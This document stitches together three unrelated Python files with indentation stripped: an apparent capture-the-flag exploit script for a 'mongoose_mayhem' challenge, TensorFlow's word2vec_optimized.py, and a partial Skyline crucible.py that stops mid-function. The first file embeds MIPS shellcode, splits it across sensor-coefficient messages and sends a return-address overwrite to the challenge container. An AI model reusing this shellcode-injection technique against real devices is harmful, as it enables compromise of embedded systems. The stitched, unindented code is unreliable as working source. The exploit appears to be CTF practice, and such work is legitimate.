#shellcode = b"\x00\x00\x00\x00\x04\x00\r4\x08\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\x00\x00\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf8\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x8e\x81\x00\x00\x00\x00\xfd\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10"
#shellcode = b"\x00\x00\x00\x00\x04\x00\r4\x08\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\x00\x00\x00\x00\xf8\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x8e\x81\x00\x00\x00\x00\xfd\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10"
shellcode = b"\x00\x00\x00\x00\x04\x00\r4\x08\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf9\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x00\x00\x00\x00\x8e\x81\x00\x00\x00\x00\xfc\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10"
shellcode_part1 = shellcode[0:56]
shellcode_part2 = shellcode[56:]
print(len(shellcode))
print(len(shellcode_part2))
shellcode_part2 += b'\x00' * (56-len(shellcode_part2))
ENABLE_SENSOR = 0x10
DISABLE_SENSOR = 0x20
SET_COEFFICIENTS1 = 0x30
SET_COEFFICIENTS2 = 0x31
SET_BIAS = 0x40
SET_TWO_POINTS = 0x58
UPDATE_FILTERS = 0x60
def receive_output(fsock):
while True:
data =fsock.stdout.read(16)
if len(data) == 0:
break
#sys.stderr.write("received {} bytes of data\n".format(len(data)))
print(data,file=sys.stderr)
sys.stderr.flush()
def do_checksum(message):
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
return message
def send_coefficients(channel, messageType, coefficients):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = messageType
message[3] = 56
message[4:60] = coefficients
message = do_checksum(message)
# message[4:12] = struct.pack("d", 5.4319)
# message[12:20] = struct.pack("d", 1.0187)
# message[20:28] = struct.pack("d", 3.0187)
# message[28:36] = struct.pack("d", 2.0187)
# message[36:44] = struct.pack("d", 10.8769)
# message[44:52] = struct.pack("d", 0.3187)
# message[52:60] = struct.pack("d", 10.99187)
channel.stdin.write(message)
def send_bias(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = SET_BIAS
message[3] = 8
message[4:12] = struct.pack("d", 2.4319)
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_two_points(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = SET_TWO_POINTS
message[3] = 8
message[4:12] = struct.pack("2I", 0xa0180590, 0xa0180590)
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_enable(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = ENABLE_SENSOR
message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_update(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = UPDATE_FILTERS
message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_disable(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = DISABLE_SENSOR
message[3] = 0
message = do_checksum(message)
channel.stdin.write(message)
def send_test(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2:54] = b'zABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy'
# message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[63] = checksum & 0xff
channel.stdin.write(message)
def send_buffer(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = 0x70
message[3] = 0x00
message[4:20] = struct.pack("4I", 0xa01805a0, 0xa01805a0,0xa01805a0,0xa01805a0 )
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[63] = checksum & 0xff
channel.stdin.write(message)
def main():
#if 'CHAL_HOST' in os.environ and 'CHAL_PORT' in os.environ:
# host = os.environ.get('CHAL_HOST')
# port = os.environ.get('CHAL_PORT')
# ticket = os.environ.get('TICKET', "")
#else:
# print('[ERROR] CHAL_HOST and CHAL_PORT environment variables are required')
# exit(-1)
#Get the host:port from LCM
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.connect((host, int(port)))
# fsock = sock.makefile('rw')
# if len(ticket):
# line = fsock.readline()
# fsock.write(ticket + '\n')
# fsock.flush()
child = subprocess.Popen(['docker', 'run', '--rm', '-i', '-e','FLAG=flag{abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ12345678901234567890}','mongoose_mayhem:challenge'],0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# child = subprocess.Popen(['./vmips', '-o', 'fpu', '-o', 'memsize=3000000','a.out.rom'], 0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
time.sleep(1)
th = threading.Thread(target=receive_output, args=(child,), daemon=True)
th.start()
time.sleep(3)
sys.stderr.write("disabling sensor readout\n")
send_disable(child)
time.sleep(3)
sys.stderr.write("sending shellcode1 in coefficients1\n")
send_coefficients(child, SET_COEFFICIENTS1, shellcode_part1)
time.sleep(1)
sys.stderr.write("sending shellcode2 in coefficients2\n")
send_coefficients(child, SET_COEFFICIENTS2, shellcode_part2)
time.sleep(1)
sys.stderr.write("sending RA overwrite\n")
# send_buffer(child)
send_two_points(child)
time.sleep(10)
if __name__ == "__main__":
main()
|
word2vec_optimized.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
def read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.global_step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words, lr) = self._session.run(
[self._epoch, self.global_step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
try:
total = self._analogy_questions.shape[0]
except AttributeError as e:
raise AttributeError("Need to read analogy questions.")
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
print(c)
break
print("unknown")
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.read_analogies() # Read analogy questions
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
crucible.py
|
import logging
try:
from Queue import Empty
except:
from queue import Empty
from redis import StrictRedis
import time
from time import time, sleep
from threading import Thread
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager
from multiprocessing import Process
from msgpack import packb
import os
from os.path import join, isfile
from os import kill, getpid, listdir
from sys import exit, version_info
import traceback
import re
import json
import gzip
import requests
try:
import urlparse
except ImportError:
import urllib.parse
try:
import urllib2
except ImportError:
import urllib.request
import urllib.error
import errno
import datetime
import shutil
import os.path
# sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
# sys.path.insert(0, os.path.dirname(__file__))
from ast import literal_eval
import settings
from skyline_functions import load_metric_vars, fail_check, mkdir_p
from crucible_algorithms import run_algorithms
skyline_app = 'crucible'
skyline_app_logger = skyline_app + 'Log'
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = settings.LOG_PATH + '/' + skyline_app + '.log'
skyline_app_loglock = skyline_app_logfile + '.lock'
skyline_app_logwait = skyline_app_logfile + '.wait'
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.' + settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
skyline_app_graphite_namespace = 'skyline.' + skyline_app + SERVER_METRIC_PATH
FULL_NAMESPACE = settings.FULL_NAMESPACE
ENABLE_CRUCIBLE_DEBUG = settings.ENABLE_CRUCIBLE_DEBUG
crucible_data_folder = str(settings.CRUCIBLE_DATA_FOLDER)
failed_checks_dir = crucible_data_folder + '/failed_checks'
class Crucible(Thread):
def __init__(self, parent_pid):
"""
Initialize Crucible
"""
super(Crucible, self).__init__()
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager() lists below and replaced with Redis sets
# self.process_list = Manager().list()
# self.metric_variables = Manager().list()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
def check_if_parent_is_alive(self):
"""
Check if the parent process is alive
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def spin_process(self, i, run_timestamp, metric_check_file):
"""
Assign a metric for a process to analyze.
:param i: python process id
:param run_timestamp: the epoch timestamp at which this process was called
:param metric_check_file: full path to the metric check file
:return: returns True
"""
child_process_pid = os.getpid()
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('child_process_pid - %s' % str(child_process_pid))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.process_list.append(child_process_pid)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = failed_checks_dir + '/' + check_file_metricname_dir + '/' + check_file_timestamp
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric_failed_check_dir - %s' % metric_failed_check_dir)
# failed_check_file = failed_checks_dir + '/' + check_file_name
failed_check_file = metric_failed_check_dir + '/' + check_file_name
# Load and validate metric variables
try:
metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
except:
logger.error('error :: failed to import metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
# TBD - a failed check Panorama update will go here, perhaps txt
# files are not the only "queue" that will be used, both, but
# Panorama, may be just a part of Skyline Flux, the flux DB
# would allow for a very nice, distributed "queue" and a
# distributed Skyline workforce...
# Any Skyline node could just have one role, e.g. lots of
# Skyline nodes running crucible only and instead of reading
# the local filesystem for input, they could read the Flux DB
# queue or both...
return
# Test metric variables
# We use a pythonic methodology to test if the variables are defined,
# this ensures that if any of the variables are not set for some reason
# we can handle unexpected data or situations gracefully and try and
# ensure that the process does not hang.
# if len(str(metric_vars.metric)) == 0:
# if not metric_vars.metric:
try:
metric_vars.metric
except:
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
metric = str(metric_vars.metric)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - metric - %s' % metric)
# if len(metric_vars.value) == 0:
# if not metric_vars.value:
try:
metric_vars.value
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
value = str(metric_vars.value)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - value - %s' % (value))
# if len(metric_vars.from_timestamp) == 0:
# if not metric_vars.from_timestamp:
try:
metric_vars.from_timestamp
except:
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
from_timestamp = str(metric_vars.from_timestamp)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - from_timestamp - %s' % from_timestamp)
# if len(metric_vars.metric_timestamp) == 0:
# if not metric_vars.metric_timestamp:
try:
metric_vars.metric_timestamp
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
metric_timestamp = str(metric_vars.metric_timestamp)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - metric_timestamp - %s' % metric_timestamp)
# if len(metric_vars.algorithms) == 0:
# if not metric_vars.algorithms:
algorithms = []
try:
metric_vars.algorithms
except:
logger.error('error :: failed to read algorithms variable from check file setting to all')
algorithms = ['all']
# if not algorithms:
# algorithms = []
# for i_algorithm in metric_vars.algorithms:
# algorithms.append(i_algorithm)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - algorithms - %s' % str(algorithms))
# if len(metric_vars.anomaly_dir) == 0:
# if not metric_vars.anomaly_dir:
try:
metric_vars.anomaly_dir
except:
logger.error('error :: failed to read anomaly_dir variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
anomaly_dir = str(metric_vars.anomaly_dir)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - anomaly_dir - %s' % anomaly_dir)
# if len(str(metric_vars.graphite_metric)) == 0:
try:
metric_vars.graphite_metric
except:
logger.info('failed to read graphite_metric variable from check file setting to False')
# yes this is a string
graphite_metric = 'False'
else:
graphite_metric = str(metric_vars.graphite_metric)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - graphite_metric - %s' % graphite_metric)
# if len(str(metric_vars.run_crucible_tests)) == 0:
try:
metric_vars.run_crucible_tests
except:
logger.info('failed to read run_crucible_tests variable from check file setting to False')
# yes this is a string
run_crucible_tests = 'False'
else:
run_crucible_tests = str(metric_vars.run_crucible_tests)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - run_crucible_tests - %s' % run_crucible_tests)
try:
metric_vars.added_by
except:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('failed to read added_by variable from check file setting to crucible - set to crucible')
added_by = 'crucible'
else:
added_by = str(metric_vars.added_by)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - added_by - %s' % added_by)
try:
metric_vars.run_script
except:
run_script = False
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - run_script - not present set to False')
else:
run_script = str(metric_vars.run_script)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - run_script - %s' % run_script)
# @added 20190612 - Feature #3108: crucible - graphite_override_uri_parameters_specific_url
# This metric variable is used to to declare absolute graphite uri
# parameters
try:
metric_vars.graphite_override_uri_parameters
except:
logger.info('failed to read graphite_override_uri_parameters variable from check file setting to False')
# yes this is a string
graphite_override_uri_parameters = False
else:
graphite_override_uri_parameters = str(metric_vars.graphite_override_uri_parameters)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - graphite_override_uri_parameters - %s' % graphite_override_uri_parameters)
# Only check if the metric does not a EXPIRATION_TIME key set, crucible
# uses the alert EXPIRATION_TIME for the relevant alert setting contexts
# whether that be analyzer, mirage, boundary, etc and sets its own
# cache_keys in redis. This prevents large amounts of data being added
# in terms of tieseries json and image files, crucible samples at the
# same EXPIRATION_TIME as alerts.
source_app = 'crucible'
expiration_timeout = 1800
remove_all_anomaly_files = False
check_expired = False
check_time = time()
if added_by == 'analyzer' or added_by == 'mirage':
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('Will check %s ALERTS' % added_by)
if settings.ENABLE_ALERTS:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('Checking %s ALERTS' % added_by)
for alert in settings.ALERTS:
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = metric
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
source_app = added_by
expiration_timeout = alert[2]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
check_age = int(check_time) - int(metric_timestamp)
if int(check_age) > int(expiration_timeout):
check_expired = True
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')
if added_by == 'boundary':
if settings.BOUNDARY_ENABLE_ALERTS:
for alert in settings.BOUNDARY_METRICS:
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = metric
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
source_app = 'boundary'
expiration_timeout = alert[2]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
check_age = int(check_time) - int(metric_timestamp)
if int(check_age) > int(expiration_timeout):
check_expired = True
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')
